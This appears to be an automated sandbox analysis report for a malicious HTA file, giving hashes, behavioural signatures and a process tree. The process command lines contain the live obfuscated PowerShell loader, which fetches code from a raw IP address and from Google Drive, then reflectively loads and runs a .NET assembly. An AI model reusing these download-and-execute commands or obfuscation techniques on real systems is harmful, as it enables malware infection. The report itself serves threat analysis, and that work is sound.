Analysis
-
max time kernel
141s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 20:20
Static task
static1
Behavioral task
behavioral1
Sample
greatthingswithmegoods.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatthingswithmegoods.hta
Resource
win10v2004-20241007-en
General
-
Target
greatthingswithmegoods.hta
-
Size
205KB
-
MD5
f319180bb125ab8cc66ecb36901d9a74
-
SHA1
ae97c7498f9477f177c36693973b88debcc312c5
-
SHA256
4e11f8c96a579711eff961da1b26ca6613f62559a7292a66933f9bbdadccdf1b
-
SHA512
ea1c65c08b708b2951b57d319af38af965b7e2753f31ad63b519610f8ad0bf6aae3733d11411ee5ee48f40088b3b2552bd59c67cd7fe44c4c687dbe09734bbab
-
SSDEEP
48:4FhWsTR/F7gNqXfEK0hh+599qhhmo592USPiJ24K0qcT99DddQLOPePmkqeeNenY:43F97gK04rqR4ac4jfs6SykjViEAIfQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 25 4188 poWerSHelL.EXe 30 4740 powershell.exe 32 4740 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4612 powershell.exe 4740 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 4188 poWerSHelL.EXe 3708 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 drive.google.com 30 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWerSHelL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings poWerSHelL.EXe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4188 poWerSHelL.EXe 4188 poWerSHelL.EXe 3708 powershell.exe 3708 powershell.exe 4612 powershell.exe 4612 powershell.exe 4740 powershell.exe 4740 powershell.exe 4740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4188 poWerSHelL.EXe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4620 wrote to memory of 4188 4620 mshta.exe 85 PID 4620 wrote to memory of 4188 4620 mshta.exe 85 PID 4620 wrote to memory of 4188 4620 mshta.exe 85 PID 4188 wrote to memory of 3708 4188 poWerSHelL.EXe 89 PID 4188 wrote to memory of 3708 4188 poWerSHelL.EXe 89 PID 4188 wrote to memory of 3708 4188 poWerSHelL.EXe 89 PID 4188 wrote to memory of 3480 4188 poWerSHelL.EXe 92 PID 4188 wrote to memory of 3480 4188 poWerSHelL.EXe 92 PID 4188 wrote to memory of 3480 4188 poWerSHelL.EXe 92 PID 3480 wrote to memory of 4692 3480 csc.exe 94 PID 3480 wrote to memory of 4692 3480 csc.exe 94 PID 3480 wrote to memory of 4692 3480 csc.exe 94 PID 4188 wrote to memory of 3256 4188 poWerSHelL.EXe 98 PID 4188 wrote to memory of 3256 4188 poWerSHelL.EXe 98 PID 4188 wrote to memory of 3256 4188 poWerSHelL.EXe 98 PID 3256 wrote to memory of 4612 3256 WScript.exe 99 PID 3256 wrote to memory of 4612 3256 WScript.exe 99 PID 3256 wrote to memory of 4612 3256 WScript.exe 99 PID 4612 wrote to memory of 4740 4612 powershell.exe 101 PID 4612 wrote to memory of 4740 4612 powershell.exe 101 PID 4612 wrote to memory of 4740 4612 powershell.exe 101
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegoods.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe"C:\Windows\sYstEM32\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe" "PowErsHELl.Exe -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt ; iEx($(ieX('[SyStem.tEXT.ENCODInG]'+[cHar]0x3a+[CHAr]0X3a+'UTf8.GetsTRIng([SYStEM.ConVert]'+[CHAR]0x3a+[cHAR]58+'fromBase64striNG('+[char]0x22+'JFE3MiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJkRUZpbklUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXRMSmtpSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnQUFrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdwbnJUUSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRUJXbHJNcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1SEFyY1hhTHpqKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3bnhudHV1RWUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBiZE93eGdSR1lCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRNzI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFblY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIiwwLDApO3NUYVJ0LVNsRUVQKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIg=='+[CHar]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5fto2th4\5fto2th4.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA8.tmp" "c:\Users\Admin\AppData\Local\Temp\5fto2th4\CSCE6DBB2B8B4974D6C8EAA954EF3909388.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgoodforme.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
256B
MD55d930af921a7e9c377b7312b99cb1218
SHA154dc631c942ba071d959bec4cd7abc5acd5d2e39
SHA256dbc33618077fe626f1e2b2b561b736952aff43756024381f66b370b3c6f9263b
SHA5126215186be70c2c20f192e4c695be3cf2963988ba9e4e965456563c5b8c4699e29a0f6128fe015ebcf62fc89459443e5905ea1ccf01ef7c6d6465113f8ce0fa00
-
Filesize
18KB
MD547e2a5045bb68db1b350a4c912b8c29c
SHA1579976f1474259f851ca0b9be6a54e3f2e6a27b8
SHA25612e47ed41840a3efe9c3621bbaaedcd294ec87bb827065d3ee84b6d796abafd9
SHA5124b2c0eded20a0025d38c02fe6fc6913db99bddeacc58a86ad21aa51a7d8cfcf8dedb5ef083821ec1a3b122a2c1b4330c792e93ee31e755eb0a1c862e38d3375e
-
Filesize
3KB
MD5d89d5288b68cf953b110407757e7ae25
SHA19a0e6b43243355a8dbb5ffad245a93246350f9a2
SHA2568f6bc7b10fba66a08bace595b76642458ff06c3598661f2cafeab9eeb583274c
SHA512ee708039235fbef64797758975707dff96eb2dcce685a7ce9cb163f7a8c1a25f04cdb1c5ed2e5ba4dde12167a2eac7e7f9d38f7528f597da82679c5247e0049a
-
Filesize
1KB
MD5db633e14638de815dae86702dde3c8c8
SHA12bc5094d1a20908ddd7c14e23d35752f659472e1
SHA2561a41fab89d8fe8c7ae77f4b687b0a787aa45a6e5dab5ca3724cce86d93284fc2
SHA512a9f732d6fd518051330ea601ff8872e0a99c72b94361d32063a52ca84989018f972b0c5e3ca75618d2ed79fbba2693f38efeefaf98f3925336ac89e90afab4b2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
138KB
MD564cc9748329c0e186cacd10d639615e6
SHA11291f245b185bd05fb09646b79f284d76e7dc0ff
SHA2562c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d
SHA51265ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba
-
Filesize
494B
MD573e437abcfe1b954153b49afe9bfb390
SHA1ce780d4b157041335670d45398cfd12dfd8941a0
SHA2568204745749c8952be4809c5aa5caf56693bc3edbbcbb578c6bcdd026ecf26d74
SHA5121247cb671caa6e622f674eac37b696cc38756d079d79f89df49a7104fe839ec8a3b4956091f9422de7c723ae0e63c0f4d078ae06444d9ea04b2e0491a5fd47d7
-
Filesize
369B
MD5a936b6de18b266844b0deb3cf1a7e906
SHA18477b25a2f937361e5f97bf0eb1c28d240ddc8e3
SHA2568cb45b0a7a18dba17fe07e3388c4d97a2c338247cd433a217395f2c54c37c867
SHA512831b4fd19bf4dcecd4c1d342d181d5fc698b1c0a7abfa2fea9286c5b13103ed7a259d2c2e539b2c655606335f2e8b9fed124e59e10357888d221422fb2334f3c
-
Filesize
652B
MD5612c261b89871865acaee10aa4e685f7
SHA15b04268abe8db10fa9e2641bd38a39e996bd672e
SHA2563517c829f2bbddf4729d6c6e0550e5e5c3d2e6f4c25a63a5c53857009d0171ea
SHA5123ab830d3c3895afb3464bf93da9a53074cc0d20c1e8defca7b9a12615753f23a3d0b566e9613e511e25491b40d23229268c8410930858325d19de758cb11ddd2